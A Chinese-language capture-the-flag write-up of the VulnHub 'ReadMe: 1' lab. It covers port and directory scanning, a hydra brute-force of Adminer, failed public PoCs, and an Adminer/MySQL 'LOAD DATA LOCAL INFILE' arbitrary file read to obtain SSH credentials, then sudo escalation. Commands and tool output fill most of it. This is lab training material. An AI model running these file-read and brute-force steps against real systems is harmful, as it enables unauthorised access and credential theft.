文章目录
ReadMe: 1 ~ VulnHub
信息收集
确定靶机ip
kali和靶机是同一网络的,所以确定是192.168.211.131或者192.168.211.13
确定开放带端口
用namp扫描端口
nmap -sS -sV -p- -T5 192.168.211.131
进一步确定靶机的ip是192.168.211.131和端口号22、80、3306
访问web页面(80端口),f12也没有发现什么
dirsearch / dirb 目录扫描
目录扫得到 adminer.php 、reminder.php、 info.php、index.html
┌──(root💀kali)-[~]
└─# dirsearch -u http://192.168.211.131/ -w /home/kali/Desktop/dicc.txt -t 100
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 100 | Wordlist size: 11462
Output File: /root/reports/http_192.168.211.131/__24-07-21_09-07-22.txt
Target: http://192.168.211.131/
[09:07:22] Starting:
[09:07:23] 403 - 280B - /.ht_wsr.txt
[09:07:23] 403 - 280B - /.htaccess.bak1
[09:07:23] 403 - 280B - /.htaccess.save
[09:07:23] 403 - 280B - /.htaccess.orig
[09:07:23] 403 - 280B - /.htaccess_orig
[09:07:23] 403 - 280B - /.htaccess_extra
[09:07:23] 403 - 280B - /.htaccess_sc
[09:07:23] 403 - 280B - /.htaccessOLD
[09:07:23] 403 - 280B - /.htaccessOLD2
[09:07:23] 403 - 280B - /.html
[09:07:23] 403 - 280B - /.httr-oauth
[09:07:23] 403 - 280B - /.htpasswd_test
[09:07:23] 403 - 280B - /.htaccess.sample
[09:07:23] 403 - 280B - /.htaccessBAK
[09:07:23] 403 - 280B - /.htm
[09:07:23] 403 - 280B - /.htpasswds
[09:07:23] 403 - 280B - /.php
[09:07:28] 200 - 1020B - /adminer.php
[09:07:37] 200 - 24KB - /info.php
[09:07:43] 200 - 524B - /reminder.php
[09:07:43] 403 - 280B - /server-status
[09:07:43] 403 - 280B - /server-status/
Task Completed
┌──(root💀kali)-[/home/kali/Downloads]
└─# dirb 'http://192.168.211.131' -p "http://192.168.211.131:80"
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jul 22 10:41:49 2024
URL_BASE: http://192.168.211.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.211.131:80
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.211.131/ ----
+ http://192.168.211.131/index.html (CODE:200|SIZE:10918)
+ http://192.168.211.131/info.php (CODE:200|SIZE:91243)
+ http://192.168.211.131/server-status (CODE:403|SIZE:280)
-----------------
END_TIME: Mon Jul 22 10:41:52 2024
DOWNLOADED: 4612 - FOUND: 3
目录扫描结果
-
adminer.php,发现是个 Adminer任意文件读取漏洞
-
info.php给出了一些绝对路径
-
reminder.php
这里可以收集到一个人名 julian
从这里可以猜出他们“电话”里面说的这个新页面 that-place-where-i-put-that-thing-that-time/
或者 是直接看图片路径得到that-place-where-i-put-that-thing-that-time/
- index.hrml
nikto
┌──(root💀kali)-[/home/kali]
└─# nikto -h 192.168.211.131
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.211.131
+ Target Hostname: 192.168.211.131
+ Target Port: 80
+ Start Time: 2024-07-20 00:55:04 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5892cd2b735b6, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: OPTIONS, HEAD, GET, POST .
+ /info.php: Output from the phpinfo() function was found.
+ /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. See: CWE-552
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /info.php?file=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ 8102 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2024-07-20 00:55:19 (GMT-4) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
whatweb
对网站都识别一下,发现没有什么框架
┌──(root💀kali)-[/home/kali]
└─# whatweb -v 192.168.211.131
WhatWeb report for http://192.168.211.131
Status : 200 OK
Title : Apache2 Ubuntu Default Page: It works
IP : 192.168.211.131
Country : RESERVED, ZZ
Summary : Apache[2.4.29], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)]
Detected Plugins:
[ Apache ]
The Apache HTTP Server Project is an effort to develop and
maintain an open-source HTTP server for modern operating
systems including UNIX and Windows NT. The goal of this
project is to provide a secure, efficient and extensible
server that provides HTTP services in sync with the current
HTTP standards.
Version : 2.4.29 (from HTTP Server Header)
Google Dorks: (3)
Website : http://httpd.apache.org/
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
OS : Ubuntu Linux
String : Apache/2.4.29 (Ubuntu) (from server string)
HTTP Headers:
HTTP/1.1 200 OK
Date: Sat, 20 Jul 2024 04:59:06 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sat, 18 May 2019 17:28:10 GMT
ETag: "2aa6-5892cd2b735b6-gzip"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3138
Connection: close
Content-Type: text/html
┌──(root💀kali)-[~]
└─# whatweb "http://192.168.211.131/reminder.php"
http://192.168.211.131/reminder.php [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[192.168.211.131]
web
基于adminer.php, 利用Adminer任意文件读取漏洞
adminer漏洞原理:
Adminer任意文件读取漏洞其实来源于MySQL“LOAD DATA INFILE”安全问题,Adminer4.6.3版本中已经修复了LOAD DATA LOCAL INFILE问题。
hydra爆破弱口令登录试试
┌──(root💀kali)-[/home/kali/Desktop]
└─# hydra -L usernames.txt -P passlist.txt -t 4 -vV -f 192.168.211.131 http-get /adminer.php
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-21 05:17:02
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 106776327975 login tries (l:81475/p:1310541), ~26694081994 tries per task
[DATA] attacking http-get://192.168.211.131:80/adminer.php
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 192.168.211.131 - login "3d" - pass "!!!4545" - 1 of 106776327975 [child 0] (0/0)
[ATTEMPT] target 192.168.211.131 - login "3d" - pass "!"�123" - 2 of 106776327975 [child 1] (0/0)
[ATTEMPT] target 192.168.211.131 - login "3d" - pass "!"�;1234" - 3 of 106776327975 [child 2] (0/0)
[ATTEMPT] target 192.168.211.131 - login "3d" - pass "!"��")" - 4 of 106776327975 [child 3] (0/0)
[80][http-get] host: 192.168.211.131 login: 3d password: !"�;1234
[STATUS] attack finished for 192.168.211.131 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-21 05:17:12
拿到**[80][http-get] host: 192.168.211.131 login: 3d password: !"�;1234**
登录后发现这个ip被拒绝连接
msfconsole
直接找也不太行………
fake-mysql-cli/gui
下载链接 https://github.com/sobinge/mysql-fake-server-gui
利用 fake-mysql-cli 或者是 fake-mysql-gui 启动一个恶意的MySQL服务器
填写恶意服务地址和用户名fileread_/etc/passwd
但是gui和cli版本都没成功
poc打
用CVE-2021-43008直接打
https://github.com/p0dalirius/CVE-2021-43008-AdminerRead?tab=readme-ov-file
AdminerRead 的下载和说明
┌──(root💀kali)-[~]
└─# git clone https://github.com/p0dalirius/AdminerRead 7 ⨯
正克隆到 'AdminerRead'...
remote: Enumerating objects: 61, done.
remote: Counting objects: 100% (34/34), done.
remote: Compressing objects: 100% (32/32), done.
remote: Total 61 (delta 18), reused 5 (delta 1), pack-reused 27
接收对象中: 100% (61/61), 1.78 MiB | 1.38 MiB/s, 完成.
处理 delta 中: 100% (19/19), 完成.
┌──(root💀kali)-[~/AdminerRead]
└─# chmod +x AdminerRead.py
┌──(root💀kali)-[~/AdminerRead]
└─# ./AdminerRead.py -h
_ _ _ ____ _
/ \ __| |_ __ ___ (_)_ __ ___ _ __| _ \ ___ __ _ __| |
/ _ \ / _` | '_ ` _ \| | '_ \ / _ \ '__| |_) / _ \/ _` |/ _` |
/ ___ \ (_| | | | | | | | | | | __/ | | _ < __/ (_| | (_| |
/_/ \_\__,_|_| |_| |_|_|_| |_|\___|_| |_| \_\___|\__,_|\__,_| v1.1.0
usage: AdminerRead.py [-h] [-v] [-s] -t TARGET_URL [-f FILE | -F FILELIST] -I DB_IP [-P DB_PORT] [-u DB_USERNAME]
[-p DB_PASSWORD] [-D DUMP_DIR] [-k]
options:
-h, --help show this help message and exit
-v, --verbose Verbose mode
-s, --only-success Only print successful read file attempts.
-t TARGET_URL, --target TARGET_URL
URL of the Adminer to connect to.
-f FILE, --file FILE Remote file to read.
-F FILELIST, --filelist FILELIST
File containing a list of paths to files to read remotely.
-I DB_IP, --db-ip DB_IP
Remote database IP where the Adminer will connect to.
-P DB_PORT, --db-port DB_PORT
Remote database port where the Adminer will connect to.
-u DB_USERNAME, --db-username DB_USERNAME
Remote database username.
-p DB_PASSWORD, --db-password DB_PASSWORD
Remote database password.
-D DUMP_DIR, --dump-dir DUMP_DIR
Directory where the dumped files will be stored.
-k, --insecure Allow insecure server connections when using SSL (default: False)
adminerread使用
┌──(root💀kali)-[~/AdminerRead]
└─# ./AdminerRead.py -I 192.168.211.132 -t http://192.168.211.131/adminer.php -f /etc/passwd
_ _ _ ____ _
/ \ __| |_ __ ___ (_)_ __ ___ _ __| _ \ ___ __ _ __| |
/ _ \ / _` | '_ ` _ \| | '_ \ / _ \ '__| |_) / _ \/ _` |/ _` |
/ ___ \ (_| | | | | | | | | | | __/ | | _ < __/ (_| | (_| |
/_/ \_\__,_|_| |_| |_|_|_| |_|\___|_| |_| \_\___|\__,_|\__,_| v1.1.0
[>] Remote Adminer version : v4.4.0
[!] Connection refused
[!] (==error==) /etc/passwd
cve_2020_10977.py
再换一个任意文件读取的 thewhiteh4t/cve-2020-10977: GitLab 12.9.0 Arbitrary File Read (github.com)poc
┌──(root💀kali)-[/home/kali/Desktop]
└─# python3 cve_2020_10977.py http://192.168.211.131 twh p4ssw0rd
----------------------------------
--- CVE-2020-10977 ---------------
--- GitLab Arbitrary File Read ---
--- 12.9.0 & Below ---------------
----------------------------------
[>] Found By : vakzz [ https://hackerone.com/reports/827052 ]
[>] PoC By : thewhiteh4t [ https://twitter.com/thewhiteh4t ]
[+] Target : http://192.168.211.131
[+] Username : twh
[+] Password : p4ssw0rd
[+] Project Names : ProjectOne, ProjectTwo
[!] Trying to Login...
[-] Status : 404
也不太行
searchsploit
kali自带searchsploit找漏洞的康康有没有什么东西
┌──(root💀kali)-[/home/kali]
└─# searchsploit adminer
------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------- ---------------------------------
Adminer 4.3.1 - Server-Side Request Forgery | php/webapps/43593.txt
------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root💀kali)-[/home/kali]
└─# cat /usr/share/exploitdb/exploits/php/webapps/43593.txt
得到
!!!!!居然是<=4.3.1,前面内容可以知道这个打靶给的adminer是4.4.0
sqlmap
adminder.php也没有跑出来东西
在reminder.php里面有一个username的点,
sqlmap -r 1.txt
sqlmap -r 没有跑出来数据,再排除sql注入方向
mysql
思路:创建一个数据库连上adminer,然后再按照adminer任意文件读取去打
(思路理解可以康康这个文章Adminer 任意文件读取漏洞 - Wiki (96.mk))
创建
CREATE DATABASE mydatabase;//创建数据库,命名为“mydatabase”
select host,user from user; //验证
读取数据,建table,命为“123”
ssh密码
然后去adminer页面登录
结合前面爆出来的路径/etc/julian.txt
直接输入命令 load data local infile “/etc/julian.txt” into table ‘123’;
看到affected说明生效了,再把数据库刷新拿到ssh连接密码
基于上面创建好的一个mysql数据库
SHOW GLOBAL VARIABLES LIKE 'local_infile';
用这个语句检查 你从客户端的本地文件系统加载数据到数据库表中的功能
已成功启用该设置,将显示以下输出:
mysql> SHOW GLOBAL VARIABLES LIKE 'local_infile'; +---------------+-------+
| Variable_name | Value |
+---------------+-------+
| local_infile | ON |
+---------------+-------+
拿到flag
以防外一,康康ls -la
提权
明显直接提权不行,找另一个用户
-
在以 julian 身份进行身份验证后,用户将能够看到 tatham 主目录的内容,看起来像是是sudo用户,以及tatham的ssh密码:So…YouFiguredOutHowToRecoverThisHuh?GGWPnoRE
-
但是直接改密码失败,所以还是要进一步找root密码
直接给了poc.c,说明距离flag不远了
进入home,发现这个下面有包括自己的两个账号,所以能确定tatham就是sudo家族成员咯
直接sudo -s (法一:经验)
密码用tatham的ssh连接密码
gcc(法二)
直接给了poc.c,说明距离flag不远了,直接gcc编译出来U28uLi5Zb3VGaWd1cmVkT3V0SG93VG9SZWNvdmVyVGhpc0h1aD9HR1dQbm9SRQ==
再base64解密得到So…YouFiguredOutHowToRecoverThisHuh?GGWPnoRE
over!